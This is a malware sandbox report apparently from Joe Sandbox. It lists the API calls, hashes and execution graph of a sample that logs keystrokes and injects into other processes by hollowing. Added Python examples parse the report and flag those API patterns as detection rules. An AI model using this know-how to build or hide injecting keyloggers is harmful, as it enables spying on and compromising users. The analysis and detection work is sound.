  • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ErrorFreeHeapLast_free
• String ID: `@$`@
• API String ID: 1353095263-20545824
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: State
                                                                                                                                                                                                                                            • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                                                                            • API String ID: 1649606143-2446555240
                                                                                                                                                                                                                                            • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                                                                                                                                                            • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,J@4fF,00412951,00000000,00000000,J@4fF,?,00000000), ref: 00412988
                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 00412998
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DeleteOpenValue
                                                                                                                                                                                                                                            • String ID: J@4fF
                                                                                                                                                                                                                                            • API String ID: 2654517830-1060276034
                                                                                                                                                                                                                                            • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                            • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0043FB12
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                                                                                                                            • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                                                                                                                                                            • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759
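The three function entries above (GetKeyState, RegOpenKeyExW/RegDeleteValueW, MultiByteToWideChar) are in the fixed shape the Joe Sandbox IDA plugin emits: an "APIs" list of `Name.MODULE(args), ref: address` bullets followed by `Key: value` bullets. The Python below is an added example, not part of the report or of Joe Sandbox, that parses that shape into records and tags the two security-relevant entries: GetKeyState(0x12) queries VK_MENU (Alt), which together with the `[CtrlL]`/`[CtrlR]` labels the report pairs it with is the modifier bookkeeping of a keystroke logger, and RegOpenKeyExW(0x80000001, ...) followed by RegDeleteValueW opens HKEY_CURRENT_USER to delete a value. The sample text is constructed by copying those entries; the parsing rules, tag names and helper names are the example's own.

```python
import re
from dataclasses import dataclass, field


@dataclass
class ApiCall:
    api: str      # e.g. "GetKeyState"
    module: str   # e.g. "USER32"
    args: list    # argument strings as printed by the plugin ("?" = unresolved)
    ref: str      # address of the call site


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # "API ID", "String ID", hashes, ...


# Constructed sample: the three entries from the report above, in the plugin's layout.
SAMPLE = """\
APIs
• GetKeyState.USER32(00000012), ref: 0040ADB5
Strings
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
• Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
APIs
• RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,J@4fF,00412951,00000000,00000000,J@4fF,?,00000000), ref: 00412988
• RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 00412998
Strings
• API ID: DeleteOpenValue
• String ID: J@4fF
• API String ID: 2654517830-1060276034
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
• GetLastError.KERNEL32 ref: 0043FB12
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
Strings
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
"""

# "• Name.MODULE(args), ref: ADDR" or, for calls without arguments, "• Name.MODULE ref: ADDR".
API_CALL_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# "• Key: value" (value may be empty, as in "String ID:").
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*)$")


def parse_entries(text):
    """Split the plugin output into one FunctionEntry per 'APIs' block."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            cur.apis.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref")))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m.group("key")] = m.group("val").strip()
    return entries


def hex_arg(call, index):
    """Argument `index` as an int, or None when the plugin printed '?' or a resolved string."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


VK_MENU = 0x12                  # Alt key; the GetKeyState argument in the first entry
HKEY_CURRENT_USER = 0x80000001  # the first RegOpenKeyExW argument in the second entry


def classify(entry):
    """Tag an entry from its API calls and the strings the plugin associated with it (example rules)."""
    tags = set()
    names = [c.api for c in entry.apis]
    for c in entry.apis:
        if c.api == "GetKeyState" and hex_arg(c, 0) == VK_MENU \
                and "[Ctrl" in entry.fields.get("String ID", ""):
            tags.add("keystroke-logging")
        if c.api == "RegOpenKeyExW" and hex_arg(c, 0) == HKEY_CURRENT_USER \
                and "RegDeleteValueW" in names:
            tags.add("hkcu-value-deletion")
    if names.count("MultiByteToWideChar") >= 2:   # size query followed by the real conversion
        tags.add("ansi-to-utf16-conversion")
    return tags


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print([c.api for c in e.apis], e.fields.get("String ID"), sorted(classify(e)))
```

The two-pass MultiByteToWideChar rule is deliberately weak: it is a normal runtime pattern and is tagged only so the record is visibly classified; the GetKeyState and registry rules are the ones worth carrying into a triage script.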

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                             Execution Coverage: 9.7%
                                                                                                                                                                                                                                             Dynamic/Decrypted Code Coverage: 100%
                                                                                                                                                                                                                                             Signature Coverage: 0%
                                                                                                                                                                                                                                             Total number of Nodes: 172
                                                                                                                                                                                                                                             Total number of Limit Nodes: 11
                                                                                                                                                                                                                                             execution_graph 56759 6e095d0 56762 6e095d2 56759->56762 56760 6e0975b 56762->56760 56763 6e02898 56762->56763 56764 6e09850 PostMessageW 56763->56764 56766 6e098bc 56764->56766 56766->56762 56755 2917880 56756 29178ce DrawTextExW 56755->56756 56758 2917926 56756->56758 56702 eb4668 56703 eb467a 56702->56703 56704 eb4686 56703->56704 56706 eb4778 56703->56706 56707 eb479d 56706->56707 56711 eb4888 56707->56711 56715 eb4878 56707->56715 56712 eb48af 56711->56712 56714 eb498c 56712->56714 56719 eb449c 56712->56719 56716 eb48af 56715->56716 56717 eb498c 56716->56717 56718 eb449c CreateActCtxA 56716->56718 56717->56717 56718->56717 56720 eb5918 CreateActCtxA 56719->56720 56722 eb59db 56720->56722 56722->56722 56723 6d228d8 56724 6d22912 56723->56724 56725 6d229a3 56724->56725 56726 6d2298e 56724->56726 56728 6d21f1c 3 API calls 56725->56728 56731 6d21f1c 56726->56731 56730 6d229b2 56728->56730 56733 6d21f27 56731->56733 56732 6d22999 56733->56732 56736 6d232e7 56733->56736 56742 6d232f8 56733->56742 56737 6d23312 56736->56737 56748 6d21f64 56736->56748 56739 6d2331f 56737->56739 56740 6d23348 CreateIconFromResourceEx 56737->56740 56739->56732 56741 6d233c6 56740->56741 56741->56732 56743 6d21f64 CreateIconFromResourceEx 56742->56743 56744 6d23312 56743->56744 56745 6d2331f 56744->56745 56746 6d23348 CreateIconFromResourceEx 56744->56746 56745->56732 56747 6d233c6 56746->56747 56747->56732 56749 6d23348 CreateIconFromResourceEx 56748->56749 56750 6d233c6 56749->56750 56750->56737 56751 ebbfe0 56752 ebc028 GetModuleHandleW 56751->56752 56753 ebc022 56751->56753 56754 ebc055 56752->56754 56753->56752 56767 ebe080 56768 ebe0c6 56767->56768 56771 ebe260 56768->56771 56774 ebde58 56771->56774 56775 ebe2c8 DuplicateHandle 56774->56775 56776 ebe1b3 56775->56776 56777 6e0651c 56778 6e06522 56777->56778 56782 6e083f0 56778->56782 56799 6e083e1 56778->56799 56779 6e06530 56783 6e0840a 56782->56783 56816 6e08ce4 56783->56816 56820 6e08d1e 56783->56820 56825 6e08c3d 56783->56825 56829 6e08719 56783->56829 56834 6e08818 56783->56834 56839 6e08c57 56783->56839 56844 6e08af7 56783->56844 56849 6e08b75 56783->56849 56854 6e08a34 56783->56854 56859 6e08c91 56783->56859 56864 6e08d30 56783->56864 56872 6e08b09 56783->56872 56876 6e08fe9 56783->56876 56880 6e09366 56783->56880 56784 6e0842e 56784->56779 56800 6e083f0 56799->56800 56802 6e08ce4 2 API calls 56800->56802 56803 6e09366 2 API calls 56800->56803 56804 6e08fe9 2 API calls 56800->56804 56805 6e08b09 2 API calls 56800->56805 56806 6e08d30 4 API calls 56800->56806 56807 6e08c91 2 API calls 56800->56807 56808 6e08a34 2 API calls 56800->56808 56809 6e08b75 2 API calls 56800->56809 56810 6e08af7 2 API calls 56800->56810 56811 6e08c57 2 API calls 56800->56811 56812 6e08818 2 API calls 56800->56812 56813 6e08719 2 API calls 56800->56813 56814 6e08c3d 2 API calls 56800->56814 56815 6e08d1e 2 API calls 56800->56815 56801 6e0842e 56801->56779 56802->56801 56803->56801 56804->56801 56805->56801 56806->56801 56807->56801 56808->56801 56809->56801 56810->56801 56811->56801 56812->56801 56813->56801 56814->56801 56815->56801 56817 6e08c44 56816->56817 56884 6e056b0 56817->56884 56888 6e056b8 56817->56888 56821 6e08e8a 56820->56821 56892 6e05ba0 56821->56892 56896 6e05b99 56821->56896 56822 6e0896d 56822->56784 56826 6e08c43 56825->56826 56827 6e056b0 ResumeThread 56826->56827 56828 6e056b8 ResumeThread 56826->56828 56827->56826 56828->56826 56831 6e0871c 56829->56831 56830 6e088cd 56830->56784 56831->56830 56900 6e05fc0 56831->56900 56904 6e05fb5 56831->56904 56836 6e087ef 56834->56836 56835 6e088cd 56835->56784 56836->56835 56837 6e05fc0 CreateProcessA 56836->56837 56838 6e05fb5 CreateProcessA 56836->56838 56837->56836 56838->56836 56840 6e08a4b 56839->56840 56840->56839 56841 6e08939 56840->56841 56908 6e05d30 56840->56908 56912 6e05d38 56840->56912 56841->56784 56845 6e08caf 56844->56845 56847 6e05d30 WriteProcessMemory 56845->56847 56848 6e05d38 WriteProcessMemory 56845->56848 56846 6e08f44 56847->56846 56848->56846 56850 6e08b81 56849->56850 56852 6e05d30 WriteProcessMemory 56850->56852 56853 6e05d38 WriteProcessMemory 56850->56853 56851 6e092c0 56852->56851 56853->56851 56855 6e08a3a 56854->56855 56856 6e08939 56855->56856 56857 6e05d30 WriteProcessMemory 56855->56857 56858 6e05d38 WriteProcessMemory 56855->56858 56856->56784 56857->56855 56858->56855 56860 6e09007 56859->56860 56916 6e05c70 56860->56916 56920 6e05c78 56860->56920 56861 6e09025 56866 6e08d35 56864->56866 56865 6e08c44 56867 6e0922b 56865->56867 56868 6e056b0 ResumeThread 56865->56868 56869 6e056b8 ResumeThread 56865->56869 56866->56865 56870 6e05ba0 Wow64SetThreadContext 56866->56870 56871 6e05b99 Wow64SetThreadContext 56866->56871 56868->56865 56869->56865 56870->56865 56871->56865 56924 6e05e20 56872->56924 56928 6e05e28 56872->56928 56873 6e08b2e 56873->56784 56877 6e08edc 56876->56877 56877->56876 56878 6e056b0 ResumeThread 56877->56878 56879 6e056b8 ResumeThread 56877->56879 56878->56877 56879->56877 56881 6e087ef 56880->56881 56882 6e05fc0 CreateProcessA 56881->56882 56883 6e05fb5 CreateProcessA 56881->56883 56882->56881 56883->56881 56885 6e056b8 ResumeThread 56884->56885 56887 6e05729 56885->56887 56887->56817 56889 6e056f8 ResumeThread 56888->56889 56891 6e05729 56889->56891 56891->56817 56893 6e05be5 Wow64SetThreadContext 56892->56893 56895 6e05c2d 56893->56895 56895->56822 56897 6e05ba0 Wow64SetThreadContext 56896->56897 56899 6e05c2d 56897->56899 56899->56822 56901 6e06049 CreateProcessA 56900->56901 56903 6e0620b 56901->56903 56905 6e05fc0 CreateProcessA 56904->56905 56907 6e0620b 56905->56907 56909 6e05d80 WriteProcessMemory 56908->56909 56911 6e05dd7 56909->56911 56911->56840 56913 6e05d80 WriteProcessMemory 56912->56913 56915 6e05dd7 56913->56915 56915->56840 56917 6e05c78 VirtualAllocEx 56916->56917 56919 6e05cf5 56917->56919 56919->56861 56921 6e05cb8 VirtualAllocEx 56920->56921 56923 6e05cf5 56921->56923 56923->56861 56925 6e05e28 ReadProcessMemory 56924->56925 56927 6e05eb7 56925->56927 56927->56873 56929 6e05e73 ReadProcessMemory 56928->56929 56931 6e05eb7 56929->56931 56931->56873
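The execution_graph dump above is a flat token stream: a node is `id address` optionally followed by the API names (or an `N API calls` summary) the plugin attributed to it, and an edge is `caller->callee`. Read that way, the node at 6e0840a fans out to helpers that wrap CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext and ResumeThread, which is the API set of process hollowing and matches the "Injects a PE file into a foreign processes" signature in the report summary. The Python below is an added example, not part of the report or of Joe Sandbox: it parses a trimmed verbatim excerpt of the dump (one of each duplicated helper kept, the 56840->56839 cycle kept on purpose), resolves node ids from the edge list (the example assumes every node has at least one edge, which holds for this graph), and reports the lowest node from which all five hollowing APIs are reachable. The function names and the `HOLLOWING_APIS` set are the example's own.

```python
import re
from collections import defaultdict

# Constructed sample: a verbatim subset of the execution_graph dump above.
GRAPH_DUMP = (
    "execution_graph 56777 6e0651c 56778 6e06522 56777->56778 56782 6e083f0 56778->56782 "
    "56799 6e083e1 56778->56799 56783 6e0840a 56782->56783 56816 6e08ce4 56783->56816 "
    "56820 6e08d1e 56783->56820 56829 6e08719 56783->56829 56839 6e08c57 56783->56839 "
    "56859 6e08c91 56783->56859 56872 6e08b09 56783->56872 56800 6e083f0 56799->56800 "
    "56802 6e08ce4 2 API calls 56800->56802 56806 6e08d30 4 API calls 56800->56806 "
    "56817 6e08c44 56816->56817 56884 6e056b0 56817->56884 56885 6e056b8 ResumeThread 56884->56885 "
    "56821 6e08e8a 56820->56821 56892 6e05ba0 56821->56892 56893 6e05be5 Wow64SetThreadContext 56892->56893 "
    "56831 6e0871c 56829->56831 56900 6e05fc0 56831->56900 56901 6e06049 CreateProcessA 56900->56901 "
    "56840 6e08a4b 56839->56840 56840->56839 56908 6e05d30 56840->56908 56909 6e05d80 WriteProcessMemory 56908->56909 "
    "56860 6e09007 56859->56860 56916 6e05c70 56860->56916 56917 6e05c78 VirtualAllocEx 56916->56917 "
    "56924 6e05e20 56872->56924 56925 6e05e28 ReadProcessMemory 56924->56925"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]+$")   # Win32 export names; "API" in "N API calls" is excluded below

# The API set that, reachable from one function, characterises process hollowing (example definition).
HOLLOWING_APIS = {"CreateProcessA", "VirtualAllocEx", "WriteProcessMemory",
                  "Wow64SetThreadContext", "ResumeThread"}


def parse_graph(dump):
    """Return ({node_id: {"addr": str, "apis": [str]}}, {caller: [callee, ...]})."""
    toks = dump.split()
    if toks and toks[0] == "execution_graph":
        toks = toks[1:]
    # Pass 1: node ids are exactly the edge endpoints. This is what lets us tell the
    # node id "56755" from an all-digit address such as "2917880" in the full dump.
    ids = set()
    for t in toks:
        m = EDGE_RE.match(t)
        if m:
            ids.update((int(m.group(1)), int(m.group(2))))
    # Pass 2: walk the stream; a known id starts a node whose next token is its address,
    # capitalised tokens after that are API names, everything else is summary text.
    nodes, succ = {}, defaultdict(list)
    i, cur = 0, None
    while i < len(toks):
        t = toks[i]
        m = EDGE_RE.match(t)
        if m:
            succ[int(m.group(1))].append(int(m.group(2)))
            cur = None
            i += 1
        elif t.isdigit() and int(t) in ids and i + 1 < len(toks):
            cur = int(t)
            nodes[cur] = {"addr": toks[i + 1], "apis": []}
            i += 2
        else:
            if cur is not None and t != "API" and API_RE.match(t):
                nodes[cur]["apis"].append(t)
            i += 1
    return nodes, succ


def reachable_apis(nodes, succ, start):
    """Union of API names on every node reachable from `start` (cycle-safe DFS)."""
    seen, stack, apis = set(), [start], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        apis.update(nodes.get(n, {}).get("apis", []))
        stack.extend(succ.get(n, []))
    return apis


def hollowing_dispatchers(nodes, succ):
    """(id, addr) of nodes that reach every hollowing API while none of their direct callees does."""
    covers = {n for n in nodes if HOLLOWING_APIS <= reachable_apis(nodes, succ, n)}
    return sorted((n, nodes[n]["addr"]) for n in covers
                  if not any(c in covers for c in succ.get(n, [])))


if __name__ == "__main__":
    nodes, succ = parse_graph(GRAPH_DUMP)
    for n, addr in hollowing_dispatchers(nodes, succ):
        print(f"{addr}: {sorted(reachable_apis(nodes, succ, n))}")
```

Running the parser over the full dump instead of the excerpt gives the same answer for this sample; the nodes labelled `N API calls` are the plugin's collapsed duplicates of the same helpers and carry no names, so they never satisfy the check on their own.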
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 241b824095518d4a23e9615492819ed026bd296b0d6502c02690ea4a9622af19
                                                                                                                                                                                                                                            • Instruction ID: 1c1f10292c2dc4bcb454ae5a329557876703c7ac5cf4e29dbfca23ed4c99623c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 241b824095518d4a23e9615492819ed026bd296b0d6502c02690ea4a9622af19
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09520834A006158FDB58DF68C588B5DB7F2FF88314F2685A8E4469B7A1DB30ED86CB50
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3f10b93212d25a6393bea126d662968e2f407322381a4f8ff8a61cf40b0443f5
                                                                                                                                                                                                                                            • Instruction ID: 43acdbf666ba247544f1f227a374771d982b2d620fdfcc316241a237f1302f4f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f10b93212d25a6393bea126d662968e2f407322381a4f8ff8a61cf40b0443f5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09426034A012059FEB54DFA8C844BAD77F2FF89310F2585A6E455EB3A1DB349D41CBA0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 908a79cf7fd9f39f1516f357b0c812285b5587e9bd56da62cdf1511a93ceec4a
• Instruction ID: 96d61036df041f92d3f2add6a50e65b5c7d598f84ad0055c2cb4e8bfd60ad29b
• Opcode Fuzzy Hash: 908a79cf7fd9f39f1516f357b0c812285b5587e9bd56da62cdf1511a93ceec4a
• Instruction Fuzzy Hash: 5D12C775D1071A8FDB54DF68C880AE9F7B1FF89300F1586AAD458A7251EB70AAC4CF90
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1bc9aa1c22fb6d7434b684ac242bbc472ad9cbd3e22b2fff544801216b631900
• Instruction ID: 79d1f05d81c9f3286ff0f07b791b50a2912a27f9e09b0d2dc3105ecf9ed60db0
• Opcode Fuzzy Hash: 1bc9aa1c22fb6d7434b684ac242bbc472ad9cbd3e22b2fff544801216b631900
• Instruction Fuzzy Hash: 1612C775D0071A8FDB54DF68C880AD9F7B1FF99300F1586AAD858A7251EB70AAC4CF90

Control-flow Graph

• Executed
• Not Executed
(control-flow graph image not reproduced; the rendered basic-block edge list for the function at 6d0fa7c has been omitted)
Strings
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID: Hhq$$dq$$dq$$dq
• API String ID: 0-1693755344
• Opcode ID: 02c03d258d1f2350b9352eba1fe5164dc3d87df81fcfda800ce4a3d18eed7438
• Instruction ID: 4e52664fc357fbb2b4a7d7ace3360dc59c48f1fe8623290d5ffdc758af65c2b0
• Opcode Fuzzy Hash: 02c03d258d1f2350b9352eba1fe5164dc3d87df81fcfda800ce4a3d18eed7438
• Instruction Fuzzy Hash: 73A1BE31B102058FEBB4DF74C851BAA73A2EF84314F34856ADC168B2D1DB75D886CBA1

Control-flow Graph

• Executed
• Not Executed
(control-flow graph image not reproduced; the rendered basic-block edge list for the function at 6d08b81 has been omitted)
Strings
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID: PHdq$PHdq
• API String ID: 0-1995607813
• Opcode ID: 4b538e9f1850268a31d1af0e5ce5f5e827174dc0cb833138aa8fed05f32c3a87
• Instruction ID: e03618b356bb9c3272e23f0b7d71cf7aee3a6217f79a3432a8b21af356fd9cb9
• Opcode Fuzzy Hash: 4b538e9f1850268a31d1af0e5ce5f5e827174dc0cb833138aa8fed05f32c3a87
• Instruction Fuzzy Hash: 02D11634B002148FDB58DF68D998AA9BBF2FF88711F1545A9E406EB3A1DB31EC45CB50
Strings
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID: (hq
• API String ID: 0-4060669308
• Opcode ID: 25d5aa3badd6bcb614b6b36f6ad060cc5b242ebddf818f2ca8473fcce6863045
• Instruction ID: 64c603239b764315198a9deaec2bbc2adada164f4715aeba6dd4a767b12d5a56
• Opcode Fuzzy Hash: 25d5aa3badd6bcb614b6b36f6ad060cc5b242ebddf818f2ca8473fcce6863045
• Instruction Fuzzy Hash: B5321734B002149FDB98DF68D494BAD7BF2BF89310F1485A9E4099B3A1DB31EC46CB91
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E061F6
Memory Dump Source
• Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: bfa37f68c51242d955088d6c18ba5f61a8afccb00670caaa28b81fcb51ae1a95
• Instruction ID: ab1020d9c9d2e37a1d1a27b54c0ec18f62a3b732f0bbacc9339fea216c8e637e
• Opcode Fuzzy Hash: bfa37f68c51242d955088d6c18ba5f61a8afccb00670caaa28b81fcb51ae1a95
• Instruction Fuzzy Hash: 1EA14971D00319DFEB60CFA8C841BEEBBB2BF48314F148569E848A7290DB759995CF91
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E061F6
Memory Dump Source
• Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: b006434f15f56e668018878664eef8c054d0d809f622450396d13b895bf6699b
• Instruction ID: 26d7ae5a0febbb248ea582509ae261f6512168c7cfa83e40d374bc5dfe8850e4
• Opcode Fuzzy Hash: b006434f15f56e668018878664eef8c054d0d809f622450396d13b895bf6699b
• Instruction Fuzzy Hash: F7914871D003199FEB60CFA8C841BEEBBB2BF48314F148569E808A7290DB749995CF91
APIs
• CreateActCtxA.KERNEL32(?), ref: 00EB59C9
Memory Dump Source
• Source File: 00000006.00000002.1713673829.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_eb0000_graias.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 6d64aef08589ee8e24c71f34d489a7b6a80222418418040e63d7d58e7487577c
• Instruction ID: e91a4b60fa51762e163f80e61dc4954a621dfa460fbdcc5c27a7698b8464928f
• Opcode Fuzzy Hash: 6d64aef08589ee8e24c71f34d489a7b6a80222418418040e63d7d58e7487577c
• Instruction Fuzzy Hash: FD41F2B1C00719CADB24CFAAC985BDEBBB5BF88304F20856AD408BB251DB756945CF50
APIs
                                                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00EB59C9
                                                                                                                                                                                                                                            Memory Dump Source
